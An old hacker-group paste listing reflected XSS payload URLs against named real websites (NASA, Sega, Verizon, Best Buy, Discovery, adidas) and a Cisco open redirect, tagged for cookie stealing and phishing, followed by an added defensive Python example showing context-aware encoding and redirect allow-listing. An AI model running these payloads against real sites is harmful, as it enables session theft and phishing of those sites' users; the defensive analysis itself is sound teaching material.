TeamHav0k -High Profile XSS+Redirect Vulns-

Posted by a guest, Feb 26th, 2012
-TeamHav0k-

We just got bored and started searching around for XSS; we found a few, plus a Cisco redirect vuln. Some targets include: NASA, Sega, Verizon, Cisco.
----------

Target: Sega.com
http://us.download-shop.sega.com/search.html
Syntax: In the search bar, type "/><script>alert(1)</script>
Danger Level: Low
Usage: none

Target: Discovery.com
http://animal.discovery.com/search/results.html?focus=site&query=</TITLE><SCRIPT>alert("XSS");</SCRIPT>&search=+
Danger Level: High
Usage: Cookie stealing, claiming XSS Tunnel/XSSF victims.

Target: Bestbuy.com
http://bestbuytheater.com/eventdetail.php?id=30563'"><script>alert('1')</script>
Danger Level: High
Usage: Cookie stealing, claiming XSS Tunnel/XSSF victims.

Target: Verizon.com
http://verizontheatre.com/events/eventdetail.php?id=31557</script>'"><script>alert('1')</script>
Danger Level: High
Usage: Cookie stealing, claiming XSS Tunnel/XSSF victims.

Target: NASA.gov
http://ghrc.nsstc.nasa.gov/hydro/search.pl?hydro&pr=<script>alert('1')</script>
http://technologygateway.nasa.gov/index.cfm?fuseaction="><script>alert('1')</script>
http://spaceflight.nasa.gov/cgi-bin/acronyms.cgi
searchdata=<script>alert(1)</script>&submit=Search&program=shuttle&searchall=false
Danger Level: High
Usage: Cookie stealing, claiming XSS Tunnel/XSSF victims.

Target: adidas.com
catalogue.adidas.com/catalogue/ae/products/?keywords="; alert(1); test="test
Danger Level: High
Usage: Cookie stealing, claiming XSS Tunnel/XSSF victims.

Target: Cisco.com
http://www.cisco.com/survey/exit.html?http://twitter.com/
Danger Level: High
Usage: Phishing.
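The payloads in the paste fall into three reflection contexts (HTML text inside `<title>`, a quoted attribute value, and a JavaScript string literal) plus one open redirect where the exit page forwards to whatever follows the `?`. The Python below is an added example and is not part of the original paste or any of the listed sites' code: a hypothetical search page template that echoes the query into all three contexts, rendered once by plain concatenation and once with per-context output encoding, and an allow-list check for an `exit.html?<url>` style redirect. The template, the `example.com` hosts in `ALLOWED_HOSTS` and the function names are assumptions; only the payload strings are taken from the paste.

```python
"""Added example (not from the paste): per-context output encoding for the
three reflection contexts the payloads above exercise, plus an allow-list
check for an exit-page style redirect. The search page template and
ALLOWED_HOSTS are hypothetical; the payload strings are copied from the paste."""
import html
import json
from urllib.parse import urlsplit

# Payloads copied from the paste, used here as constructed test input only.
PAYLOAD_HTML = '</TITLE><SCRIPT>alert("XSS");</SCRIPT>'   # closes the <title> text node
PAYLOAD_ATTR = '30563\'"><script>alert(\'1\')</script>'   # closes a quoted attribute
PAYLOAD_JS = '"; alert(1); test="test'                    # closes a JS string literal

# Hypothetical search page that echoes the query in three contexts at once.
TEMPLATE = (
    "<html><head><title>Search: {title}</title></head><body>"
    '<input name="query" value="{attr}">'
    "<script>var q = {js};</script>"
    "</body></html>"
)


def render_vulnerable(query: str) -> str:
    """Reflects the raw query everywhere; each payload above breaks out."""
    return TEMPLATE.format(title=query, attr=query, js='"' + query + '"')


def js_string_literal(value: str) -> str:
    """JSON-encode for a JS string literal and escape angle brackets so the
    literal can never contain a '</script>' that closes the element."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def render_hardened(query: str) -> str:
    """Same template, each slot encoded for the context it lands in."""
    return TEMPLATE.format(
        title=html.escape(query, quote=False),   # HTML text node
        attr=html.escape(query, quote=True),     # quoted attribute value
        js=js_string_literal(query),             # JavaScript string literal
    )


def script_tag_count(page: str) -> int:
    """Naive check a scanner might use: count <script> openings on the page.
    The template itself contributes exactly one."""
    return page.lower().count("<script")


# Open redirect: the exit page takes its target from the raw query string,
# e.g. exit.html?http://twitter.com/ as in the paste.
ALLOWED_HOSTS = {"www.example.com", "survey.example.com"}  # hypothetical allow-list


def exit_target(request_url: str) -> str:
    """Extract the redirect target for an exit.html?<url> style handler."""
    return urlsplit(request_url).query


def safe_exit_target(target: str, fallback: str = "/") -> str:
    """Accept only same-origin absolute paths or http(s) URLs whose host is
    allow-listed; protocol-relative, javascript: and foreign hosts fall back."""
    parts = urlsplit(target)
    if not parts.scheme and not parts.netloc:
        if target.startswith("/") and not target.startswith("//"):
            return target
        return fallback
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
        return target
    return fallback


if __name__ == "__main__":
    for name, payload in (("html", PAYLOAD_HTML), ("attr", PAYLOAD_ATTR), ("js", PAYLOAD_JS)):
        print(name, "vulnerable <script> count:", script_tag_count(render_vulnerable(payload)),
              "hardened:", script_tag_count(render_hardened(payload)))
    print(safe_exit_target(exit_target("http://www.example.com/survey/exit.html?http://twitter.com/")))
```

Two things the example shows that the list alone does not: the adidas-style payload never adds a `<script>` tag, so `script_tag_count` reports the same value for the vulnerable and hardened pages and a grep for `<script` would miss it, which is why the check has to be per context (a JS string literal needs JSON encoding with `<` escaped, not HTML entity encoding); and for the redirect, rejecting only `http://` prefixes is not enough, since `//twitter.com/` and `javascript:` targets have to fall back as well.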